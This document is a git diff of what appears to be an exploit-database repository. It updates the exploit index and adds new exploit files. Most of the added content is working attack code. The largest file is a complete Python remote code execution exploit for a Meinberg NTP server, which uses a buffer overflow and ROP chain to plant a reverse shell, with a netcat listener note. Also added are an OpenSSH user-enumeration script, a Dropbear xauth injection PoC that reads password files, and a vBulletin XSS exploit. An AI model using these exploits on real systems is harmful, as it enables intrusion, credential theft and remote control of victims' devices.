-kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 +39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 -39945,platforms/linux/remote/39945.rb,"Apache Continuum Arbitrary Command Execution",2016-06-14,metasploit,linux,remote,8080 +39945,platforms/linux/remote/39945.rb,"Apache Continuum Arbitrary Command Execution",2016-06-14,Metasploit,linux,remote,8080 39946,platforms/php/webapps/39946.php,"WordPress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80 39947,platforms/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos,0 39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Stored XSS",2016-06-15,HaHwul,php,webapps,80 @@ -36171,7 +36171,7 @@ id,file,description,date,author,platform,type,port 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Stored XSS",2016-06-17,"David Silveiro",php,webapps,80 39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 -39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443 +39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 40054,platforms/linux/local/40054.c,"Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 @@ -36255,7 +36255,7 @@ id,file,description,date,author,platform,type,port 40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0 40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80 40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0 -40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80 +40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,Metasploit,linux,remote,80 40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80 40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0 40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF",2016-07-08,"Persian Hack Team",php,webapps,80 @@ -36269,8 +36269,14 @@ id,file,description,date,author,platform,type,port 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,CripSlick,lin_x86-64,shellcode,0 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0 -40107,platforms/windows/local/40107.rb,"MS16-032 Secondary Logon Handle Privilege Escalation",2016-07-13,metasploit,windows,local,0 -40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,metasploit,linux,remote,443 +40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0 +40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,Metasploit,linux,remote,443 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 +40113,platforms/linux/remote/40113.txt,"OpenSSHD <= 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22 +40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0 +40115,platforms/php/webapps/40115.py,"vBulletin 4.x - SQLi in breadcrumbs via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0 +40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 +40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 +40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 diff --git a/platforms/hardware/remote/40120.py b/platforms/hardware/remote/40120.py new file mode 100755 index 000000000..d9fc8cea9 --- /dev/null +++ b/platforms/hardware/remote/40120.py @@ -0,0 +1,219 @@ +#!/usr/bin/python +# +# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit +# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/ +# +# 271 - trigger notifications +# 299 - copy user defined notifications + +# Kernel Version: 2.6.15.1 +# System Version: 530 +# Lantime configuration utility 1.27 +# ELX800/GPS M4x V5.30p + +import socket +import struct +import telnetlib +import sys +import time + +if len(sys.argv) < 3: + print "[-] " + exit(1) + + +host = sys.argv[1] +callback_ip = sys.argv[2] + +print "[+] exploiting Meinburg M400" +port = 80 + +################################################################### +# +# Copy user_defined_notification to /www/filetmp +# Append reverse shell string to /file/tmp +# +csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) +csock.connect ( (host, int(port)) ) + +param = "A" * 0x2850 + +resp = "POST /cgi-bin/main HTTP/1.1\r\n" +resp += "Host: " + host + "\r\n" +resp += "User-Agent: Mozilla/5.0\r\n" +resp += "Accept: text/html\r\n" +resp += "Accept-Language: en-US\r\n" +resp += "Connection: keep-alive\r\n" +resp += "Content-Type: application/x-www-form-urlencoded\r\n" + +system = 0x80490B0 +exit = 0x80492C0 +some_str = 0x850BDB8 + +#must have a listener setup to receive the callback connection on ip 192.168.60.232 +# i.e. nc -v -l -p 4444 +command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash/tmp/foo;" >> /www/filetmp' + +msg = "button=" + "A"*10028 +msg += struct.pack("I", system ) +msg += struct.pack("I", exit ) +msg += struct.pack("I", some_str ) +msg += command + "\x00" + +resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" +resp += msg +csock.send(resp) +csock.close() + +time.sleep(1) + +################################################################### +# +# Copy /www/filetmp to user_defined_notification +# +csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) +csock.connect ( (host, int(port)) ) + +param = "A" * 0x2850 + +resp = "POST /cgi-bin/main HTTP/1.1\r\n" +resp += "Host: " + host + "\r\n" +resp += "User-Agent: Mozilla/5.0\r\n" +resp += "Accept: text/html\r\n" +resp += "Accept-Language: en-US\r\n" +resp += "Connection: keep-alive\r\n" +resp += "Content-Type: application/x-www-form-urlencoded\r\n" + +send_cmd = 0x807ED88 +system = 0x80490B0 +exit = 0x80492C0 +some_str = 0x850BDB8 +ret = 0x804CE65 + +#stack pivot +stack_pivot = 0x8049488 +msg = "button=" + "A" * 9756 + +msg += "B" * 28 +msg += struct.pack("I", 0x7FFEE01A ) # ebp +msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret +msg += struct.pack("I", some_str - 0x100 ) # some place +msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret +msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret +msg += struct.pack("I", ret ) * (71/4) + +msg += struct.pack("I", send_cmd ) +msg += struct.pack("I", exit ) +msg += struct.pack("I", 0x80012111 ) # [eax + 0x60] +msg += struct.pack("I", some_str ) # buffer +msg += struct.pack("I", 0xffffffff ) # count +msg += "E" * 120 + +msg += struct.pack("I", 0xB1E8B434 ) # ebx +msg += struct.pack("I", some_str - 100 ) # esi +msg += struct.pack("I", some_str - 100 ) # edi +msg += struct.pack("I", some_str - 0x100 ) # ebp +msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret +msg += "A" * 100 + +resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" +resp += msg +csock.send(resp) +csock.close + +time.sleep(1) + +################################################################### +# +# Trigger reverse shell +# + +csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) +csock.connect ( (host, int(port)) ) + +param = "A" * 0x2850 + +resp = "POST /cgi-bin/main HTTP/1.1\r\n" +resp += "Host: " + host + "\r\n" +resp += "User-Agent: Mozilla/5.0\r\n" +resp += "Accept: text/html\r\n" +resp += "Accept-Language: en-US\r\n" +resp += "Connection: keep-alive\r\n" +resp += "Content-Type: application/x-www-form-urlencoded\r\n" + +send_cmd = 0x807ED88 +system = 0x80490B0 +exit = 0x80492C0 +some_str = 0x850BDB8 +ret = 0x804CE65 + +#stack pivot +stack_pivot = 0x8049488 +msg = "button=" + "A" * 9756 + +msg += "B" * 28 +msg += struct.pack("I", 0x7FFEE01A ) # ebp +msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret +msg += struct.pack("I", some_str - 0x100 ) # some place +msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret +msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret +msg += struct.pack("I", ret ) * (71/4) + +msg += struct.pack("I", send_cmd ) +msg += struct.pack("I", exit ) +msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60] +msg += struct.pack("I", some_str ) # buffer +msg += struct.pack("I", 0xffffffff ) # count +msg += "E" * 120 + +msg += struct.pack("I", 0xB1E8B434 ) # ebx +msg += struct.pack("I", some_str - 100 ) # esi +msg += struct.pack("I", some_str - 100 ) # edi +msg += struct.pack("I", some_str - 0x100 ) # ebp +msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret +msg += "A" * 100 + +resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" +resp += msg +csock.send(resp) +csock.close() + +time.sleep(1) + + +print "[+] cleaning up" +################################################################### +# +# Kill all mains that are hung-up +# +csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) +csock.connect ( (host, int(port)) ) + +param = "A" * 0x2850 + +resp = "POST /cgi-bin/main HTTP/1.1\r\n" +resp += "Host: " + host + "\r\n" +resp += "User-Agent: Mozilla/5.0\r\n" +resp += "Accept: text/html\r\n" +resp += "Accept-Language: en-US\r\n" +resp += "Connection: keep-alive\r\n" +resp += "Content-Type: application/x-www-form-urlencoded\r\n" + +system = 0x80490B0 +exit = 0x80492C0 +some_str = 0x850BDB8 + +command = 'killall main' + +msg = "button=" + "A"*10028 +msg += struct.pack("I", system ) +msg += struct.pack("I", exit ) +msg += struct.pack("I", some_str ) +msg += command + "\x00" + +resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" +resp += msg +csock.send(resp) +csock.close() + +print "[+] enjoy" \ No newline at end of file diff --git a/platforms/linux/local/19467.c b/platforms/linux/local/19467.c index 2266a60ac..77e904664 100755 --- a/platforms/linux/local/19467.c +++ b/platforms/linux/local/19467.c @@ -1,6 +1,6 @@ -source: http://www.securityfocus.com/bid/597/info +// source: http://www.securityfocus.com/bid/597/info -pt_chown is a program included with glibc 2.1.x that exists to aid the proper allocation of terminals for non-suid programs that don't have devpts support. It is installed setuid root, and is shipped with RedHat Linux 6.0. As it stands, pt_chown is vulnerable to an attack that allows malicious users to write aribtrary data to tty input/output streams (open file desciptors -> tty) that don't belong to them (you could theoretically get full control of the terminal). This is done by fooling the program into giving you access (it lacks security checks). Whether you can be compromised or not depends on the software you are using and whether it has support for devpts (screen, midnight commander, etc). The consequences are hijacking of terminals, possibly leading to a root compromise. +// pt_chown is a program included with glibc 2.1.x that exists to aid the proper allocation of terminals for non-suid programs that don't have devpts support. It is installed setuid root, and is shipped with RedHat Linux 6.0. As it stands, pt_chown is vulnerable to an attack that allows malicious users to write aribtrary data to tty input/output streams (open file desciptors -> tty) that don't belong to them (you could theoretically get full control of the terminal). This is done by fooling the program into giving you access (it lacks security checks). Whether you can be compromised or not depends on the software you are using and whether it has support for devpts (screen, midnight commander, etc). The consequences are hijacking of terminals, possibly leading to a root compromise. int main(int a,char* b[]) { diff --git a/platforms/linux/remote/40113.txt b/platforms/linux/remote/40113.txt new file mode 100755 index 000000000..d2261ce66 --- /dev/null +++ b/platforms/linux/remote/40113.txt @@ -0,0 +1,56 @@ +Source: http://seclists.org/fulldisclosure/2016/Jul/51 + +-------------------------------------------------------------------- +User Enumeration using Open SSHD (<=Latest version). +------------------------------------------------------------------- + +Abstract: +----------- +By sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most +modern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash. + +CVE-ID +--------- +CVE-2016-6210 + +Tested versions +-------------------- +This issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well). + +Fix +----------------- +This issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet). +(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion). + +Details +---------------- +When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD +source code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm. +If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter +response time from the server for non-existing users. + +Sample code: +---------------- +import paramiko +import time +user=raw_input("user: ") +p='A'*25000 +ssh = paramiko.SSHClient() +starttime=time.clock() +ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) +try: + ssh.connect('127.0.0.1', username=user, + password=p) +except: + endtime=time.clock() +total=endtime-starttime +print(total) + +(Valid users will result in higher total time). + +*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user... + +*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP +packets of the server, since this will eliminate any network delays on the way. + +Eddie Harari \ No newline at end of file diff --git a/platforms/linux/remote/40119.md b/platforms/linux/remote/40119.md new file mode 100755 index 000000000..49808de13 --- /dev/null +++ b/platforms/linux/remote/40119.md @@ -0,0 +1,350 @@ +VuNote +============ + + Author: + Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116 + Version: 0.2 + Date: Mar 3rd, 2016 + + Tag: dropbearsshd xauth command injection may lead to forced-command bypass + +Overview +-------- + + Name: dropbear + Vendor: Matt Johnston + References: * https://matt.ucc.asn.au/dropbear/dropbear.html [1] + + Version: 2015.71 + Latest Version: 2015.71 + Other Versions: <= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years) + Platform(s): linux + Technology: c + + Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') + Origin: remote + Min. Privs.: post auth + + CVE: CVE-2016-3116 + + + +Description +--------- + +quote website [1] + +>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers. + +Summary +------- + +An authenticated user may inject arbitrary xauth commands by sending an +x11 channel request that includes a newline character in the x11 cookie. +The newline acts as a command separator to the xauth binary. This attack requires +the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector. + +By injecting xauth commands one gains limited* read/write arbitrary files, +information leakage or xauth-connect capabilities. These capabilities can be +leveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass +account restriction. This is generally not expected. + +The injected xauth commands are performed with the effective permissions of the +logged in user as the sshd already dropped its privileges. + +Quick-Info: + +* requires: X11Forwarding yes +* does *NOT* bypass /bin/false due to special treatment (like nologin) +* bypasses forced-commands (allows arbitr. read/write) + +Capabilities (xauth): + +* Xauth + * write file: limited chars, xauthdb format + * read file: limit lines cut at first \s + * infoleak: environment + * connect to other devices (may allow port probing) + + +see attached PoC + + +Details +------- + +// see annotated code below + + * x11req (svr-x11fwd.c:46) + + * execchild (svr-chansession.c:893) + *- x11setauth (svr-x11fwd.c:129) + +Upon receiving an `x11-req` type channel request dropbearsshd parses the channel request +parameters `x11authprot` and `x11authcookie` from the client ssh packet where +`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) +and `x11authcookie` contains the actual x11 auth cookie. This information is stored +in a session specific datastore. When calling `execute` on that session, dropbear will +call `execchild` and - in case it was compiled with x11 support - setup x11 forwarding +by executing `xauth` with the effective permissions of the user and pass commands via `stdin`. +Note that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains +user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a +command-separator to the `xauth` binary, this allows a client to inject arbitrary +`xauth` commands. + +This is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth +command injection: + + SYNOPSIS + xauth [ -f authfile ] [ -vqibn ] [ command arg ... ] + + add displayname protocolname hexkey + generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] + [n]extract filename displayname... + [n]list [displayname...] + [n]merge [filename...] + remove displayname... + source filename + info + exit + quit + version + help + ? + +Interesting commands are: + + info - leaks environment information / path + ~# xauth info + xauth: file /root/.Xauthority does not exist + Authority file: /root/.Xauthority + File new: yes + File locked: no + Number of entries: 0 + Changes honored: yes + Changes made: no + Current input: (argv):1 + + source - arbitrary file read (cut on first `\s`) + # xauth source /etc/shadow + xauth: file /root/.Xauthority does not exist + xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::" + + extract - arbitrary file write + * limited characters + * in xauth.db format + * since it is not compressed it can be combined with `xauth add` to + first store data in the database and then export it to an arbitrary + location e.g. to plant a shell or do other things. + + generate - connect to : (port probing, connect back and pot. exploit + vulnerabilities in X.org + + +Source +------ + +Inline annotations are prefixed with `//#!` + +* handle x11 request, stores cookie in `chansess` + ```c + /* called as a request for a session channel, sets up listening X11 */ + /* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */ + int x11req(struct ChanSess * chansess) { + + int fd; + + /* we already have an x11 connection */ + if (chansess->x11listener != NULL) { + return DROPBEAR_FAILURE; + } + + chansess->x11singleconn = buf_getbyte(ses.payload); + chansess->x11authprot = buf_getstring(ses.payload, NULL); //#! store user tainted data + chansess->x11authcookie = buf_getstring(ses.payload, NULL); //#! store user tainted data + chansess->x11screennum = buf_getint(ses.payload); + ``` + +* set auth cookie/authprot + + ```c + /* This is called after switching to the user, and sets up the xauth + * and environment variables. */ + void x11setauth(struct ChanSess *chansess) { + + char display[20]; /* space for "localhost:12345.123" */ + FILE * authprog = NULL; + int val; + + if (chansess->x11listener == NULL) { + return; + } + + ... + + /* popen is a nice function - code is strongly based on OpenSSH's */ + authprog = popen(XAUTH_COMMAND, "w"); //#! run xauth binary + if (authprog) { + fprintf(authprog, "add %s %s %s\n", + display, chansess->x11authprot, chansess->x11authcookie); //#! \n injection in cookie, authprot + pclose(authprog); + } else { + fprintf(stderr, "Failed to run %s\n", XAUTH_COMMAND); + } + } + ``` + +Proof of Concept +---------------- + +Prerequisites: + +* install python 2.7.x +* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x +* run `poc.py` + +Note: see cve-2016-3115 [3] for `poc.py` + + Usage: + + path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key + + +poc: + +1. configure one user (user1) for `force-commands`: + ```c + #PUBKEY line - force commands: only allow "whoami" + #cat /home/user1/.ssh/authorized_keys + command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box + + #cat /etc/passwd + user1:x:1001:1001:,,,:/home/user1:/bin/bash + ``` + +2. run dropbearsshd (x11fwd is on by default) + + ```c + #> ~/dropbear-2015.71/dropbear -R -F -E -p 2222 + [22861] Not backgrounding + [22862] Child connection from 192.168.139.1:49597 + [22862] Forced command 'whoami' + [22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597 + ``` + +3. `forced-commands` - connect with user1 and display env information + + ```c + #> python 2222 user1 .demoprivkey + + INFO:__main__:add this line to your authorized_keys file: + #PUBKEY line - force commands: only allow "whoami" + #cat /home/user/.ssh/authorized_keys + command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box + + INFO:__main__:connecting to: user1:@192.168.139.129:2222 + INFO:__main__:connected! + INFO:__main__: + Available commands: + .info + .readfile + .writefile + .exit .quit + + + #> .info + DEBUG:__main__:auth_cookie: '\ninfo' + DEBUG:__main__:dummy exec returned: None + INFO:__main__:Authority file: /home/user1/.Xauthority + File new: no + File locked: no + Number of entries: 2 + Changes honored: yes + Changes made: no + Current input: (stdin):2 + user1 + /usr/bin/xauth: (stdin):1: bad "add" command line + + ... + ``` + +4. `forced-commands` - read `/etc/passwd` + + ```c + ... + #> .readfile /etc/passwd + DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' + DEBUG:__main__:dummy exec returned: None + INFO:__main__:root:x:0:0:root:/root:/bin/bash + daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin + bin:x:2:2:bin:/bin:/usr/sbin/nologin + sys:x:3:3:sys:/dev:/usr/sbin/nologin + sync:x:4:65534:sync:/bin:/bin/sync + ... + ``` + +5. `forced-commands` - write `/tmp/testfile` + + ```c + #> .writefile /tmp/testfile1 `thisisatestfile` + DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa' + DEBUG:__main__:dummy exec returned: None + DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile1 127.0.0.250:65500' + DEBUG:__main__:dummy exec returned: None + DEBUG:__main__:user1 + /usr/bin/xauth: (stdin):1: bad "add" command line + + #> INFO:__main__:/tmp/testfile1 + + #> ls -lsat /tmp/testfile1 + 4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1 + + #> cat /tmp/testfile1 + ú65500hiú65500`thisisatestfile`ªr + ``` + +6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100 + + ```c + #> generate 8.8.8.8:100 + DEBUG:__main__:auth_cookie: '\ngenerate 8.8.8.8:100' + DEBUG:__main__:dummy exec returned: None + INFO:__main__:user1 + /usr/bin/xauth: (stdin):1: bad "add" command line + /usr/bin/xauth: (stdin):2: unable to open display "8.8.8.8:100". + + #> tcpdump + IP 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0 + ``` + +Fix +--- + +* Sanitize user-tainted input `chansess->x11authcookie` + + +Mitigation / Workaround +------------------------ + +* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD` + +Notes +----- + +Thanks to the OpenSSH team for coordinating the fix! + +Vendor response see: changelog [4] + + +References +---------- + + [1] https://matt.ucc.asn.au/dropbear/dropbear.html + [2] http://linux.die.net/man/1/xauth + [3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/ + [4] https://matt.ucc.asn.au/dropbear/CHANGES + +Contact +------- + + https://github.com/tintinweb \ No newline at end of file diff --git a/platforms/php/webapps/40114.py b/platforms/php/webapps/40114.py new file mode 100755 index 000000000..19eccc3ad --- /dev/null +++ b/platforms/php/webapps/40114.py @@ -0,0 +1,238 @@ +CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth) +================================================================================================ + +Overview +-------- + + date : 10/12/2014 + cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base + cwe : 79 + + vendor : vBulletin Solutions + product : vBulletin 4 + versions affected : latest 4.x and 5.x (to date); verified <= 4.2.2 ; <= 5.0.x + * vBulletin 5.0.5 (verified) + * vBulletin 4.2.2 (verified) + * vBulletin 4.2.1 (verified) + * vBulletin 4.2.0 PL2 (verified) + + exploitability : + * remotely exploitable + * requires authentication (apikey) + * requires non-default features to be enabled (API interface, API-Logging) + * requires user interaction to trigger exploit (admincp - admin views logs) + + patch availability (to date) : None + + +Abstract +--------- + + vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name) + allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. + Code is executed once an admin visits the API log page and clicks on the API clients name. + + risk: rather low - due to the fact that you the api key is required + you can probably use CVE-2014-2023 to obtain the api key + + +Details +-------- + + vulnerable component: + ./admincp/apilog.php?do=viewclient + apilog.php does not sanitize xmlrpc client provided data before passing it to + print_label_row to generate the output page. + + +Proof of Concept (PoC) +---------------------- + + see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 + + + 1) prerequisites + 1.1) enable API, generate API-key + logon to AdminCP + goto "vBulletin API"->"API-Key" and enable the API interface, generate key + goto "vBulletin API"->"API-Log" and enable all API logging + 2) run PoC + edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL) + run PoC, wait for SUCCESS! message + 3) trigger exploit + logon to AdminCP + goto "vBulletin API"->"API-Log" and hit "view" + in search results click on "client name" + the injected msgbox pops up + + +Timeline +-------- + + 2014-01-14: initial vendor contact - no reply + 2014-01-24: vendor contact - no reply + 2014-10-13: public disclosure + +Contact +-------- + + tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 + + +(0x721427D8) + + +- - - + + +#!/usr/bin/env python +# -*- coding: utf-8 -*- +''' +@author: tintinweb 0x721427D8 +''' +import urllib2, cookielib, urllib, json, hashlib + +class Exploit(object): + + baseurl = None + cookies = None + + def __init__(self,baseurl,params, debuglevel=1): + self.cookies = cookielib.LWPCookieJar() + handlers = [ + urllib2.HTTPHandler(debuglevel=debuglevel), + urllib2.HTTPSHandler(debuglevel=debuglevel), + urllib2.HTTPCookieProcessor(self.cookies) + ] + self.browser = urllib2.build_opener(*handlers) + self.baseurl=baseurl + self.params = params + + def call(self,path="",data={}): + assert(isinstance(data,dict)) + data = urllib.urlencode(data) + + req = urllib2.Request("%s%s"%(self.baseurl,path),data) + req.add_header("Content-Type", "application/x-www-form-urlencoded") + + return self.browser.open(req) + + def call_json(self,path=None,data={}): + try: + x=self.call(path,data).read() + print "raw_response", x + resp = json.loads(x) + except urllib2.HTTPError, he: + resp = he.read() + return resp + + + def vb_init_api(self): + params = {'api_m':'api_init'} + params.update(self.params) + data = self.call_json("?%s"%(urllib.urlencode(params))) + self.session = data + return data + + def vb_call(self, params): + api_sig = self._vb_build_api_sig(params) + req_params = self._vb_build_regstring(api_sig) + params.update(req_params) + data = self.call_json("?%s"%(urllib.urlencode(params)),data=params) + if not isinstance(data, dict): + return data + if 'errormessage' in data['response'].keys(): + raise Exception(data) + return data + + def _ksort(self, d): + ret = [] + for key, value in [(k,d[k]) for k in sorted(d.keys())]: + ret.append( "%s=%s"%(key,value)) + return "&".join(ret) + + def _ksort_urlencode(self, d): + ret = [] + for key, value in [(k,d[k]) for k in sorted(d.keys())]: + ret.append( urllib.urlencode({key:value})) + 